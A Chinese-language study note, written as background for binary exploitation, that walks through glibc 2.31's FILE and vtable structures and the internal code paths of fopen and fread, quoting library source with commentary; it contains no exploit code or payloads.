# Pwn-File structure note
> Author: 堇姬Naup
## 前言
glibc提供很多I/O操作,主要就是去打這些東西
printf
scanf
fopen
fread
fwrite
...
主要看的source code:
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/libio.h
## high level overiew
![image](https://hackmd.io/_uploads/rk7zdFu9R.png)
每次用printf等I/O function都syscall一次有點浪費時間,加個buffer優化他,等到buffer積累到一個程度,就輸出
![image](https://hackmd.io/_uploads/H1hM_Fdq0.png)
## 以前會看到的
常看到的這兩行,是設定不要有buffer,這樣會IO會比較單純
```c=
setvbuf(stdin, 0, _IONBF, 0);
setvbuf(stdout, 0, _IONBF, 0);
```
## File
這三個指向`_IO_FILE_plus` 這個struct
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/stdio.c#L33
```c
FILE *stdin = (FILE *) &_IO_2_1_stdin_;
FILE *stdout = (FILE *) &_IO_2_1_stdout_;
FILE *stderr = (FILE *) &_IO_2_1_stderr_;
```
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/libio.h#L149
```c
extern struct _IO_FILE_plus _IO_2_1_stdin_;
extern struct _IO_FILE_plus _IO_2_1_stdout_;
extern struct _IO_FILE_plus _IO_2_1_stderr_;
```
`_IO_FILE_plus`是個這樣的struct,裡面包含了FILE這個struct跟vtable
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/libioP.h#L324
```c
struct _IO_FILE_plus
{
FILE file;
const struct _IO_jump_t *vtable;
};
```
去追FILE這個struct
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/bits/types/FILE.h#L7
```c
typedef struct _IO_FILE FILE;
```
裡面有很多的flag,並且有很多buffer,大致上有兩種
- read buffer
- write buffer
read base是buffer開始
read end是buffer結束
read ptr是buffer當前用到的位置
以此類推
繼續往下看看到`struct _IO_FILE *_chain;`把IO_FILE串成一條chain
`int _fileno`是個int
|num|代表|
|---|---|
|0|stdin|
|1|stdout|
|2|stderr|
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/bits/types/struct_FILE.h#L49
```c
struct _IO_FILE
{
int _flags; /* High-order word is _IO_MAGIC; rest is flags. */
/* The following pointers correspond to the C++ streambuf protocol. */
char *_IO_read_ptr; /* Current read pointer */
char *_IO_read_end; /* End of get area. */
char *_IO_read_base; /* Start of putback+get area. */
char *_IO_write_base; /* Start of put area. */
char *_IO_write_ptr; /* Current put pointer. */
char *_IO_write_end; /* End of put area. */
char *_IO_buf_base; /* Start of reserve area. */
char *_IO_buf_end; /* End of reserve area. */
/* The following fields are used to support backing up and undo. */
char *_IO_save_base; /* Pointer to start of non-current get area. */
char *_IO_backup_base; /* Pointer to first valid character of backup area */
char *_IO_save_end; /* Pointer to end of non-current get area. */
struct _IO_marker *_markers;
struct _IO_FILE *_chain;
int _fileno; //文件描述符
int _flags2;
__off_t _old_offset; /* This used to be _offset but it's too small. */
/* 1+column number of pbase(); 0 is unknown. */
unsigned short _cur_column;
signed char _vtable_offset;
char _shortbuf[1];
_IO_lock_t *_lock; //同步用
#ifdef _IO_USE_OLD_IO_FILE
};
```
這邊可以看到他define了很多跟flag有關的東西,你可以看到很多magic number可以設定,像是IO file不能read等
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/libio.h#L67
```c
/* Magic number and bits for the _flags field. The magic number is
mostly vestigial, but preserved for compatibility. It occupies the
high 16 bits of _flags; the low 16 bits are actual flag bits. */
#define _IO_MAGIC 0xFBAD0000 /* Magic number */
#define _IO_MAGIC_MASK 0xFFFF0000
#define _IO_USER_BUF 0x0001 /* Don't deallocate buffer on close. */
#define _IO_UNBUFFERED 0x0002
#define _IO_NO_READS 0x0004 /* Reading not allowed. */
#define _IO_NO_WRITES 0x0008 /* Writing not allowed. */
#define _IO_EOF_SEEN 0x0010
#define _IO_ERR_SEEN 0x0020
#define _IO_DELETE_DONT_CLOSE 0x0040 /* Don't call close(_fileno) on close. */
#define _IO_LINKED 0x0080 /* In the list of all open files. */
#define _IO_IN_BACKUP 0x0100
#define _IO_LINE_BUF 0x0200
#define _IO_TIED_PUT_GET 0x0400 /* Put and get pointer move in unison. */
#define _IO_CURRENTLY_PUTTING 0x0800
#define _IO_IS_APPENDING 0x1000
#define _IO_IS_FILEBUF 0x2000
/* 0x4000 No longer used, reserved for compat. */
#define _IO_USER_LOCK 0x8000
```
再來去追vtable
簡單理解成一個指標table,存放個函數指標,要找對應函數就會到vtable查表
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/libioP.h#L293
```c
struct _IO_jump_t
{
JUMP_FIELD(size_t, __dummy);
JUMP_FIELD(size_t, __dummy2);
JUMP_FIELD(_IO_finish_t, __finish);
JUMP_FIELD(_IO_overflow_t, __overflow);
JUMP_FIELD(_IO_underflow_t, __underflow);
JUMP_FIELD(_IO_underflow_t, __uflow);
JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
/* showmany */
JUMP_FIELD(_IO_xsputn_t, __xsputn);
JUMP_FIELD(_IO_xsgetn_t, __xsgetn);
JUMP_FIELD(_IO_seekoff_t, __seekoff);
JUMP_FIELD(_IO_seekpos_t, __seekpos);
JUMP_FIELD(_IO_setbuf_t, __setbuf);
JUMP_FIELD(_IO_sync_t, __sync);
JUMP_FIELD(_IO_doallocate_t, __doallocate);
JUMP_FIELD(_IO_read_t, __read);
JUMP_FIELD(_IO_write_t, __write);
JUMP_FIELD(_IO_seek_t, __seek);
JUMP_FIELD(_IO_close_t, __close);
JUMP_FIELD(_IO_stat_t, __stat);
JUMP_FIELD(_IO_showmanyc_t, __showmanyc);
JUMP_FIELD(_IO_imbue_t, __imbue);
};
```
## file stream
我們在open新的file時候,fd=3,之後以此類推,原因是前面是stdin、stdout、stderr(0、1、2),他用`IO_list_all`的單向鏈表儲存
![image](https://hackmd.io/_uploads/rJn2EuMF0.png)
這裡面就是IO_FILE這個struct
## defination
這邊來看一下,實際define的地方
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/stdfiles.c#L35
```c
#ifdef _IO_MTSAFE_IO
# define DEF_STDFILE(NAME, FD, CHAIN, FLAGS) \
static _IO_lock_t _IO_stdfile_##FD##_lock = _IO_lock_initializer; \
static struct _IO_wide_data _IO_wide_data_##FD \
= { ._wide_vtable = &_IO_wfile_jumps }; \
struct _IO_FILE_plus NAME \
= {FILEBUF_LITERAL(CHAIN, FLAGS, FD, &_IO_wide_data_##FD), \
&_IO_file_jumps};
#else
# define DEF_STDFILE(NAME, FD, CHAIN, FLAGS) \
static struct _IO_wide_data _IO_wide_data_##FD \
= { ._wide_vtable = &_IO_wfile_jumps }; \
struct _IO_FILE_plus NAME \
= {FILEBUF_LITERAL(CHAIN, FLAGS, FD, &_IO_wide_data_##FD), \
&_IO_file_jumps};
#endif
```
```c
DEF_STDFILE(_IO_2_1_stdin_, 0, 0, _IO_NO_WRITES);
DEF_STDFILE(_IO_2_1_stdout_, 1, &_IO_2_1_stdin_, _IO_NO_READS);
DEF_STDFILE(_IO_2_1_stderr_, 2, &_IO_2_1_stdout_, _IO_NO_READS+_IO_UNBUFFERED);
struct _IO_FILE_plus *_IO_list_all = &_IO_2_1_stderr_;
```
第一欄 -> 名字
第二欄 -> fd
第三欄 -> 鏈表 `(_IO_list_all -> _IO_2_1_stderr_ -> _IO_2_1_stdout_ -> _IO_2_1_stdin_ -> 0)`
第四欄 -> 各類FLAG
vtable被設為`_IO_file_jumps`
這邊明確定義了每個函數的指標
```c
const struct _IO_jump_t _IO_file_jumps libio_vtable =
{
JUMP_INIT_DUMMY,
JUMP_INIT(finish, _IO_file_finish),
JUMP_INIT(overflow, _IO_file_overflow),
JUMP_INIT(underflow, _IO_file_underflow),
JUMP_INIT(uflow, _IO_default_uflow),
JUMP_INIT(pbackfail, _IO_default_pbackfail),
JUMP_INIT(xsputn, _IO_file_xsputn),
JUMP_INIT(xsgetn, _IO_file_xsgetn),
JUMP_INIT(seekoff, _IO_new_file_seekoff),
JUMP_INIT(seekpos, _IO_default_seekpos),
JUMP_INIT(setbuf, _IO_new_file_setbuf),
JUMP_INIT(sync, _IO_new_file_sync),
JUMP_INIT(doallocate, _IO_file_doallocate),
JUMP_INIT(read, _IO_file_read),
JUMP_INIT(write, _IO_new_file_write),
JUMP_INIT(seek, _IO_file_seek),
JUMP_INIT(close, _IO_file_close),
JUMP_INIT(stat, _IO_file_stat),
JUMP_INIT(showmanyc, _IO_default_showmanyc),
JUMP_INIT(imbue, _IO_default_imbue)
};
libc_hidden_data_def (_IO_file_jumps)
```
## I/O manipulation
既然已經知道了FILE的結構,那接下來來看glibc提供的操作FILE的函數
(這部分有點複雜,可以直接看總結)
### fopen
大致流程如下:
* malloc 分配 FILE + vtable + lock 空間
* 初始化 FILE,將 vtable 設置為 glibc 中已經寫好的各個函數
* 將 FILE 鏈入 _IO_list_all
* 系統調用 open 打開文件,並設置文件描述符號
接下來來看source code
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/stdio.h#L242
```c
/* Open a file and create a new stream for it.
This function is a possible cancellation point and therefore not
marked with __THROW. */
extern FILE *fopen (const char *__restrict __filename,
const char *__restrict __modes) __wur;
```
實際定義fopen
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/iofopen.c#L83
```c
FILE *
_IO_new_fopen (const char *filename, const char *mode)
{
return __fopen_internal (filename, mode, 1);
}
```
他調用了 __fopen_internal
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/iofopen.c#L55
```c
FILE *
__fopen_internal (const char *filename, const char *mode, int is32)
{
struct locked_FILE
{
struct _IO_FILE_plus fp;
#ifdef _IO_MTSAFE_IO
_IO_lock_t lock;
#endif
struct _IO_wide_data wd;
} *new_f = (struct locked_FILE *) malloc (sizeof (struct locked_FILE));
if (new_f == NULL)
return NULL;
#ifdef _IO_MTSAFE_IO
new_f->fp.file._lock = &new_f->lock;
#endif
_IO_no_init (&new_f->fp.file, 0, 0, &new_f->wd, &_IO_wfile_jumps);
_IO_JUMPS (&new_f->fp) = &_IO_file_jumps;
_IO_new_file_init_internal (&new_f->fp);
if (_IO_file_fopen ((FILE *) new_f, filename, mode, is32) != NULL)
return __fopen_maybe_mmap (&new_f->fp.file);
_IO_un_link (&new_f->fp);
free (new_f);
return NULL;
}
```
filename -> 要打開的文件。
mode -> 模式(如 "r", "w", "a")
is32 -> 32 bits or 64 bits
定義了一個鎖
```c
struct locked_FILE
{
struct _IO_FILE_plus fp;
#ifdef _IO_MTSAFE_IO
_IO_lock_t lock;
#endif
struct _IO_wide_data wd;
} *new_f = (struct locked_FILE *) malloc (sizeof (struct locked_FILE));
```
包含了 FILE_plus(file跟vtable) 跟 _IO_wide_data (操作寬字符數據)
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/libio.h#L122
並且malloc了一塊chunk new_f,來存放該struct
接著調用 `_IO_no_init (&new_f->fp.file, 0, 0, &new_f->wd, &_IO_wfile_jumps);`
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/genops.c#L561
```c
void
_IO_no_init (FILE *fp, int flags, int orientation,
struct _IO_wide_data *wd, const struct _IO_jump_t *jmp)
{
_IO_old_init (fp, flags);
fp->_mode = orientation;
if (orientation >= 0)
{
fp->_wide_data = wd;
fp->_wide_data->_IO_buf_base = NULL;
fp->_wide_data->_IO_buf_end = NULL;
fp->_wide_data->_IO_read_base = NULL;
fp->_wide_data->_IO_read_ptr = NULL;
fp->_wide_data->_IO_read_end = NULL;
fp->_wide_data->_IO_write_base = NULL;
fp->_wide_data->_IO_write_ptr = NULL;
fp->_wide_data->_IO_write_end = NULL;
fp->_wide_data->_IO_save_base = NULL;
fp->_wide_data->_IO_backup_base = NULL;
fp->_wide_data->_IO_save_end = NULL;
fp->_wide_data->_wide_vtable = jmp;
}
else
/* Cause predictable crash when a wide function is called on a byte
stream. */
fp->_wide_data = (struct _IO_wide_data *) -1L;
fp->_freeres_list = NULL;
}
```
這部分將一個FILE結構進行初始化,並進入了`_IO_old_init`
```c
void
_IO_old_init (FILE *fp, int flags)
{
fp->_flags = _IO_MAGIC|flags;
fp->_flags2 = 0;
if (stdio_needs_locking)
fp->_flags2 |= _IO_FLAGS2_NEED_LOCK;
fp->_IO_buf_base = NULL;
fp->_IO_buf_end = NULL;
fp->_IO_read_base = NULL;
fp->_IO_read_ptr = NULL;
fp->_IO_read_end = NULL;
fp->_IO_write_base = NULL;
fp->_IO_write_ptr = NULL;
fp->_IO_write_end = NULL;
fp->_chain = NULL; /* Not necessary. */
fp->_IO_save_base = NULL;
fp->_IO_backup_base = NULL;
fp->_IO_save_end = NULL;
fp->_markers = NULL;
fp->_cur_column = 0;
#if _IO_JUMPS_OFFSET
fp->_vtable_offset = 0;
#endif
#ifdef _IO_MTSAFE_IO
if (fp->_lock != NULL)
_IO_lock_init (*fp->_lock);
#endif
}
```
_IO_file_jumps 就是vtable
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/fileops.c#L1433
```c
const struct _IO_jump_t _IO_file_jumps libio_vtable =
{
JUMP_INIT_DUMMY,
JUMP_INIT(finish, _IO_file_finish),
JUMP_INIT(overflow, _IO_file_overflow),
JUMP_INIT(underflow, _IO_file_underflow),
JUMP_INIT(uflow, _IO_default_uflow),
JUMP_INIT(pbackfail, _IO_default_pbackfail),
JUMP_INIT(xsputn, _IO_file_xsputn),
JUMP_INIT(xsgetn, _IO_file_xsgetn),
JUMP_INIT(seekoff, _IO_new_file_seekoff),
JUMP_INIT(seekpos, _IO_default_seekpos),
JUMP_INIT(setbuf, _IO_new_file_setbuf),
JUMP_INIT(sync, _IO_new_file_sync),
JUMP_INIT(doallocate, _IO_file_doallocate),
JUMP_INIT(read, _IO_file_read),
JUMP_INIT(write, _IO_new_file_write),
JUMP_INIT(seek, _IO_file_seek),
JUMP_INIT(close, _IO_file_close),
JUMP_INIT(stat, _IO_file_stat),
JUMP_INIT(showmanyc, _IO_default_showmanyc),
JUMP_INIT(imbue, _IO_default_imbue)
};
libc_hidden_data_def (_IO_file_jumps)
```
接著調用`_IO_new_file_init_internal`
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/genops.c#L529
```c
void
_IO_new_file_init_internal (struct _IO_FILE_plus *fp)
{
/* POSIX.1 允許使用另一個文件句柄來改變我們文件描述符的位置。
因此,在第一次執行 fseek 操作之前(並且直到隨後的 fflush 操作),
我們實際上無法確定文件的實際位置。 */
fp->file._offset = _IO_pos_BAD;
// 設定文件的標誌,表示文件buffer已關閉
fp->file._flags |= CLOSED_FILEBUF_FLAGS;
// 將這個文件指針鏈入到鏈表中
_IO_link_in (fp);
// 將文件描述符設為 -1,表示文件尚未關聯到有效的文件描述符
fp->file._fileno = -1;
}
```
以上內容都是準備工作
接下來呼叫`_IO_file_fopen`(是`_IO_new_file_fopen`別稱),準備開始開檔案了
```c
libc_hidden_ver (_IO_new_file_fopen, _IO_file_fopen)
```
來看` _IO_new_file_fopen`,有點長,這邊分段看
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/fileops.c#L211
基本設定
```c
FILE *
_IO_new_file_fopen (FILE *fp, const char *filename, const char *mode,
int is32not64)
{
int oflags = 0, omode;
int read_write;
int oprot = 0666;
int i;
FILE *result;
const char *cs;
const char *last_recognized;
```
確認文件是否已經開啟
```c
if (_IO_file_is_open (fp))
return 0;
```
根據mode進行設定
```c
// 根據 mode 的第一個字元決定文件打開方式
switch (*mode)
{
case 'r':
omode = O_RDONLY; // 只讀模式
read_write = _IO_NO_WRITES; // 禁止寫操作
break;
case 'w':
omode = O_WRONLY; // 只寫模式
oflags = O_CREAT|O_TRUNC; // 如果文件不存在,創建文件並截斷文件
read_write = _IO_NO_READS; // 禁止讀操作
break;
case 'a':
omode = O_WRONLY; // 追加模式
oflags = O_CREAT|O_APPEND; // 如果文件不存在,創建文件並追加到文件末尾
read_write = _IO_NO_READS|_IO_IS_APPENDING; // 禁止讀操作並設置追加標誌
break;
default:
__set_errno (EINVAL); // 無效參數錯誤
return NULL;
}
```
```c
// 解析 mode 字串中的其他參數
for (i = 1; i < 7; ++i)
{
switch (*++mode)
{
case '\0':
break;
case '+':
omode = O_RDWR; // 讀寫模式
read_write &= _IO_IS_APPENDING; // 如果是追加模式,保持標誌不變
last_recognized = mode;
continue;
case 'x':
oflags |= O_EXCL; // 獨佔創建,若文件已存在則返回錯誤
last_recognized = mode;
continue;
case 'b':
last_recognized = mode; // 二進制模式(在 UNIX 系統中通常無影響)
continue;
case 'm':
fp->_flags2 |= _IO_FLAGS2_MMAP; // 設置內存映射標誌
continue;
case 'c':
fp->_flags2 |= _IO_FLAGS2_NOTCANCEL; // 設置不允許取消標誌
continue;
case 'e':
oflags |= O_CLOEXEC; // 設置 close-on-exec 標誌
fp->_flags2 |= _IO_FLAGS2_CLOEXEC;
continue;
default:
/* 忽略其他未知標誌 */
continue;
}
break;
}
```
之後呼叫了`_IO_file_open`
```c
result = _IO_file_open (fp, filename, omode|oflags, oprot, read_write,
is32not64);
```
使用syscall,去打開文件,並且fileno設為文件描述符,並將該struct鏈入
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/fileops.c#L180
```c
FILE *
_IO_file_open (FILE *fp, const char *filename, int posix_mode, int prot,
int read_write, int is32not64)
{
int fdesc;
// 如果 FILE 結構體中的 _flags2 包含 _IO_FLAGS2_NOTCANCEL 標誌
if (__glibc_unlikely (fp->_flags2 & _IO_FLAGS2_NOTCANCEL))
// 使用不會被取消的版本的 open 系統調用
fdesc = __open_nocancel (filename,
posix_mode | (is32not64 ? 0 : O_LARGEFILE), prot);
else
// 否則使用標準的 open 系統調用
fdesc = __open (filename, posix_mode | (is32not64 ? 0 : O_LARGEFILE), prot);
// 如果文件描述符小於 0,表示打開文件失敗,返回 NULL
if (fdesc < 0)
return NULL;
// 將打開的文件描述符存儲在 FILE 結構體的 _fileno 成員中
fp->_fileno = fdesc;
// 設置 FILE 結構體中的相關標誌
_IO_mask_flags (fp, read_write, _IO_NO_READS + _IO_NO_WRITES + _IO_IS_APPENDING);
// 如果是追加模式且禁止讀取,將文件指針移動到文件末尾
if ((read_write & (_IO_IS_APPENDING | _IO_NO_READS))
== (_IO_IS_APPENDING | _IO_NO_READS))
{
// 將文件指針移動到文件末尾,但不更新文件指針的緩存
off64_t new_pos = _IO_SYSSEEK (fp, 0, _IO_seek_end);
// 如果移動失敗且錯誤不是 ESPIPE,關閉文件描述符並返回 NULL
if (new_pos == _IO_pos_BAD && errno != ESPIPE)
{
__close_nocancel (fdesc);
return NULL;
}
}
// 將 FILE 結構體鏈接到內部的鏈表中
_IO_link_in ((struct _IO_FILE_plus *) fp);
// 返回 FILE 指針
return fp;
}
libc_hidden_def (_IO_file_open)
```
會再做一次鏈入的原因是
```c
void
_IO_link_in (struct _IO_FILE_plus *fp)
{
if ((fp->file._flags & _IO_LINKED) == 0)
{
fp->file._flags |= _IO_LINKED;
#ifdef _IO_MTSAFE_IO
_IO_cleanup_region_start_noarg (flush_cleanup);
_IO_lock_lock (list_all_lock);
run_fp = (FILE *) fp;
_IO_flockfile ((FILE *) fp);
#endif
fp->file._chain = (FILE *) _IO_list_all;
_IO_list_all = fp;
#ifdef _IO_MTSAFE_IO
_IO_funlockfile ((FILE *) fp);
run_fp = NULL;
_IO_lock_unlock (list_all_lock);
_IO_cleanup_region_end (0);
#endif
}
}
libc_hidden_def (_IO_link_in)
```
剩下的不是很重要
```c
if (result != NULL)
{
// 檢查 mode 字串中是否指定了字符集轉換
cs = strstr (last_recognized + 1, ",ccs=");
if (cs != NULL)
{
// 載入適當的轉換並設置為寬字符模式
struct gconv_fcts fcts;
struct _IO_codecvt *cc;
char *endp = __strchrnul (cs + 5, ',');
char *ccs = malloc (endp - (cs + 5) + 3);
if (ccs == NULL)
{
int malloc_err = errno; // 獲取 malloc 錯誤
(void) _IO_file_close_it (fp);
__set_errno (malloc_err);
return NULL;
}
*((char *) __mempcpy (ccs, cs + 5, endp - (cs + 5))) = '\0';
strip (ccs, ccs);
if (__wcsmbs_named_conv (&fcts, ccs[2] == '\0'
? upstr (ccs, cs + 5) : ccs) != 0)
{
// 轉換模組加載失敗,無法繼續
(void) _IO_file_close_it (fp);
free (ccs);
__set_errno (EINVAL);
return NULL;
}
free (ccs);
// 確保轉換步驟數目為 1
assert (fcts.towc_nsteps == 1);
assert (fcts.tomb_nsteps == 1);
// 初始化寬字符讀寫指針
fp->_wide_data->_IO_read_ptr = fp->_wide_data->_IO_read_end;
fp->_wide_data->_IO_write_ptr = fp->_wide_data->_IO_write_base;
// 清除狀態,重新開始
memset (&fp->_wide_data->_IO_state, '\0', sizeof (__mbstate_t));
memset (&fp->_wide_data->_IO_last_state, '\0', sizeof (__mbstate_t));
// 設置編碼轉換函式
cc = fp->_codecvt = &fp->_wide_data->_codecvt;
cc->__cd_in.step = fcts.towc;
cc->__cd_in.step_data.__invocation_counter = 0;
cc->__cd_in.step_data.__internal_use = 1;
cc->__cd_in.step_data.__flags = __GCONV_IS_LAST;
cc->__cd_in.step_data.__statep = &result->_wide_data->_IO_state;
cc->__cd_out.step = fcts.tomb;
cc->__cd_out.step_data.__invocation_counter = 0;
cc->__cd_out.step_data.__internal_use = 1;
cc->__cd_out.step_data.__flags = __GCONV_IS_LAST | __GCONV_TRANSLIT;
cc->__cd_out.step_data.__statep = &result->_wide_data->_IO_state;
// 從現在開始,使用寬字符回調函式
_IO_JUMPS_FILE_plus (fp) = fp->_wide_data->_wide_vtable;
// 設置模式
result->_mode = 1;
}
}
return result;
```
總結一下
![image](https://hackmd.io/_uploads/B10R5GE3R.png)
### fread
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/stdio.h#L646
```c
/* Read chunks of generic data from STREAM.
This function is a possible cancellation point and therefore not
marked with __THROW. */
extern size_t fread (void *__restrict __ptr, size_t __size,
size_t __n, FILE *__restrict __stream) __wur;
```
宣告了fread的地方
接下來去找實際定義fread的部分
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/iofread.c#L29
```c
size_t
_IO_fread (void *buf, size_t size, size_t count, FILE *fp)
{
size_t bytes_requested = size * count;
size_t bytes_read;
CHECK_FILE (fp, 0);
if (bytes_requested == 0)
return 0;
_IO_acquire_lock (fp);
bytes_read = _IO_sgetn (fp, (char *) buf, bytes_requested);
_IO_release_lock (fp);
return bytes_requested == bytes_read ? count : bytes_read / size;
}
```
buf -> 儲存文件的地方
size -> 讀的大小
count 是要讀取元素個數
FILE *fp -> 讀的文件pointer
_IO_acquire_lock、_IO_release_lock -> 鎖跟解鎖,防止race
CHECK_FILE -> 一個define -> 檢查文件指標的有效性
```c
#ifdef IO_DEBUG
# define CHECK_FILE(FILE, RET) do { \
if ((FILE) == NULL \
|| ((FILE)->_flags & _IO_MAGIC_MASK) != _IO_MAGIC) \
{ \
__set_errno (EINVAL); \
return RET; \
} \
} while (0)
#else
# define CHECK_FILE(FILE, RET) do { } while (0)
#endif
```
這邊順便補一下各種error
https://elixir.bootlin.com/glibc/glibc-2.31/source/sysdeps/mach/hurd/bits/errno.h#L254
這部分是實際上執行fread的部分,他調用了_IO_sgetn
```c
bytes_read = _IO_sgetn(fp, (char *)buf, bytes_requested);
```
調用 _IO_XSGETN
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/genops.c#L407
```c
size_t
_IO_sgetn (FILE *fp, void *data, size_t n)
{
/* FIXME handle putback buffer here! */
return _IO_XSGETN (fp, data, n);
}
libc_hidden_def (_IO_sgetn)
```
這幾段簡單來說就是要去抓到vtable中的__xsgetn
```c
#define _IO_XSGETN(FP, DATA, N) JUMP2 (__xsgetn, FP, DATA, N)
```
```c
#define JUMP2(FUNC, THIS, X1, X2) (_IO_JUMPS_FUNC(THIS)->FUNC) (THIS, X1, X2)
```
```c
#if _IO_JUMPS_OFFSET
# define _IO_JUMPS_FUNC(THIS) \
(IO_validate_vtable \
(*(struct _IO_jump_t **) ((void *) &_IO_JUMPS_FILE_plus (THIS) \
+ (THIS)->_vtable_offset)))
# define _IO_JUMPS_FUNC_UPDATE(THIS, VTABLE) \
(*(const struct _IO_jump_t **) ((void *) &_IO_JUMPS_FILE_plus (THIS) \
+ (THIS)->_vtable_offset) = (VTABLE))
# define _IO_vtable_offset(THIS) (THIS)->_vtable_offset
#else
# define _IO_JUMPS_FUNC(THIS) (IO_validate_vtable (_IO_JUMPS_FILE_plus (THIS)))
# define _IO_JUMPS_FUNC_UPDATE(THIS, VTABLE) \
(_IO_JUMPS_FILE_plus (THIS) = (VTABLE))
# define _IO_vtable_offset(THIS) 0
#endif
```
```c
#define _IO_JUMPS_FILE_plus(THIS) \
_IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE_plus, vtable)
```
```c
#define _IO_CAST_FIELD_ACCESS(THIS, TYPE, MEMBER) \
(*(_IO_MEMBER_TYPE (TYPE, MEMBER) *)(((char *) (THIS)) \
+ offsetof(TYPE, MEMBER)))
```
實際上__xsgetn是`_IO_file_xsgetn`,這邊有寫
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/fileops.c#L1433
這邊追進去看_IO_file_xsgetn
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/fileops.c#L1272
```c
size_t
_IO_file_xsgetn (FILE *fp, void *data, size_t n)
{
size_t want, have;
ssize_t count;
char *s = data;
want = n;
if (fp->_IO_buf_base == NULL)
{
/* Maybe we already have a push back pointer. */
if (fp->_IO_save_base != NULL)
{
free (fp->_IO_save_base);
fp->_flags &= ~_IO_IN_BACKUP;
}
_IO_doallocbuf (fp);
}
while (want > 0)
{
have = fp->_IO_read_end - fp->_IO_read_ptr;
if (want <= have)
{
memcpy (s, fp->_IO_read_ptr, want);
fp->_IO_read_ptr += want;
want = 0;
}
else
{
if (have > 0)
{
s = __mempcpy (s, fp->_IO_read_ptr, have);
want -= have;
fp->_IO_read_ptr += have;
}
/* Check for backup and repeat */
if (_IO_in_backup (fp))
{
_IO_switch_to_main_get_area (fp);
continue;
}
/* If we now want less than a buffer, underflow and repeat
the copy. Otherwise, _IO_SYSREAD directly to
the user buffer. */
if (fp->_IO_buf_base
&& want < (size_t) (fp->_IO_buf_end - fp->_IO_buf_base))
{
if (__underflow (fp) == EOF)
break;
continue;
}
/* These must be set before the sysread as we might longjmp out
waiting for input. */
_IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);
_IO_setp (fp, fp->_IO_buf_base, fp->_IO_buf_base);
/* Try to maintain alignment: read a whole number of blocks. */
count = want;
if (fp->_IO_buf_base)
{
size_t block_size = fp->_IO_buf_end - fp->_IO_buf_base;
if (block_size >= 128)
count -= want % block_size;
}
count = _IO_SYSREAD (fp, s, count);
if (count <= 0)
{
if (count == 0)
fp->_flags |= _IO_EOF_SEEN;
else
fp->_flags |= _IO_ERR_SEEN;
break;
}
s += count;
want -= count;
if (fp->_offset != _IO_pos_BAD)
_IO_pos_adjust (fp->_offset, count);
}
}
return n - want;
}
libc_hidden_def (_IO_file_xsgetn)
```
這邊一樣慢慢看
首先是他會檢查是否已經分配buffer了,如果沒有分配就進入,先檢查有沒有backup buffer,如果沒有的話就直接進`_IO_doallocbuf (fp)`,分配一塊
若有backup buffer就把他free掉
補一下backup buffer,他會被`_IO_save_base`指向,若需要回退回原來buffer的狀況,就會根據backup來還原
```c
if (fp->_IO_buf_base == NULL)
{
/* Maybe we already have a push back pointer. */
if (fp->_IO_save_base != NULL)
{
free (fp->_IO_save_base);
fp->_flags &= ~_IO_IN_BACKUP;
}
_IO_doallocbuf (fp);
}
```
_IO_doallocbuf
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/genops.c#L342
先檢查是否已經有分配buffer了,如果有就return
經過一些簡單檢查後會呼叫 _IO_DOALLOCATE
```c
void
_IO_doallocbuf (FILE *fp)
{
if (fp->_IO_buf_base)
return;
if (!(fp->_flags & _IO_UNBUFFERED) || fp->_mode > 0)
if (_IO_DOALLOCATE (fp) != EOF)
return;
_IO_setb (fp, fp->_shortbuf, fp->_shortbuf+1, 0);
}
libc_hidden_def (_IO_doallocbuf)
```
_IO_DOALLOCATE 實際上會是 _IO_file_doallocate
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/fileops.c#L1433
```c
JUMP_INIT(doallocate, _IO_file_doallocate),
```
所以追進去
這裡會分配一塊buffer
_IO_SYSSTAT 會獲取該file狀態
調用malloc給一塊buffer
_IO_setb 會賦值給buffer pointer
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/genops.c#L327
```c
int
_IO_file_doallocate (FILE *fp)
{
size_t size;
char *p;
struct stat64 st;
size = BUFSIZ;
if (fp->_fileno >= 0 && __builtin_expect (_IO_SYSSTAT (fp, &st), 0) >= 0)
{
if (S_ISCHR (st.st_mode))
{
/* Possibly a tty. */
if (
#ifdef DEV_TTY_P
DEV_TTY_P (&st) ||
#endif
local_isatty (fp->_fileno))
fp->_flags |= _IO_LINE_BUF;
}
#if defined _STATBUF_ST_BLKSIZE
if (st.st_blksize > 0 && st.st_blksize < BUFSIZ)
size = st.st_blksize;
#endif
}
p = malloc (size);
if (__glibc_unlikely (p == NULL))
return EOF;
_IO_setb (fp, p, p + size, 1);
return 1;
}
libc_hidden_def (_IO_file_doallocate)
```
以上是分配空間
接下來要開始讀取
want -> 想要讀取的data量
have -> 剩餘的空間(have = fp->_IO_read_end - fp->_IO_read_ptr)
如果剩餘空間>想讀取的data
直接把data放到buffer上
並把_IO_read_ptr往上加
```c
while (want > 0)
{
have = fp->_IO_read_end - fp->_IO_read_ptr;
if (want <= have)
{
memcpy (s, fp->_IO_read_ptr, want);
fp->_IO_read_ptr += want;
want = 0;
}
```
想要讀的(want) > 剩餘的(have)
如果有空間,就先把buffer讀滿
並且檢查有沒有backup buffer
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/genops.c#L124
有的話就切會回來
